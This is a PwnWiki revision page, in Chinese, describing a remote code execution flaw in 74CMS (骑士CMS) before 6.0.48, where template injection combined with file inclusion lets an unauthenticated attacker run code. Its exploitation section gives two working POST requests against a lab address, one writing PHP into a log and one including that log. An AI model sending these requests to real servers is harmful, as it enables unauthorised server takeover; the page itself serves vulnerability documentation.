Difference between revisions of "騎士CMS模版註入 &文件包含getshell漏洞/zh-cn"
From PwnWiki
(Created page with "骑士CMS人才系统,是一项基于PHP+MYSQL为核心开发的一套免费+开源专业人才网站系统。软件具执行效率高、模板自由切换、后台管理功...") |
(Created page with "骑士 CMS < 6.0.48") |
||
| Line 3: | Line 3: | ||
骑士CMS人才系统,是一项基于PHP+MYSQL为核心开发的一套免费+开源专业人才网站系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。 | 骑士CMS人才系统,是一项基于PHP+MYSQL为核心开发的一套免费+开源专业人才网站系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。 | ||
| − | + | 骑士CMS官方发布安全更新,修复了一处远程代码执行漏洞。由于骑士CMS某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可以在无需登录的情况下执行任意代码,控制服务器。 | |
| − | |||
| − | |||
| − | + | ==影响范围== | |
| − | + | 骑士 CMS < 6.0.48 | |
| − | |||
| − | |||
| − | |||
| − | |||
| − | |||
==漏洞利用== | ==漏洞利用== | ||
| − | |||
| − | + | 使用火狐hackbar发送POST: | |
| − | |||
| − | |||
<pre> | <pre> | ||
http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl | http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl | ||
| Line 30: | Line 20: | ||
| − | + | 可以看到日志记录。 | |
| − | |||
| − | |||
<div lang="chinese" dir="ltr" class="mw-content-ltr"> | <div lang="chinese" dir="ltr" class="mw-content-ltr"> | ||
Revision as of 17:16, 5 July 2021
漏洞描述
骑士CMS人才系统,是一项基于PHP+MYSQL为核心开发的一套免费+开源专业人才网站系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。
骑士CMS官方发布安全更新,修复了一处远程代码执行漏洞。由于骑士CMS某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可以在无需登录的情况下执行任意代码,控制服务器。
影响范围
骑士 CMS < 6.0.48
漏洞利用
使用火狐hackbar发送POST:
http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl
variable=1&tpl=<?php phpinfo(); ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>
可以看到日志记录。
包含這條日誌,注意路徑和日誌名稱:
http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl
variable=1&tpl=data/Runtime/Logs/Home/21_02_05.log
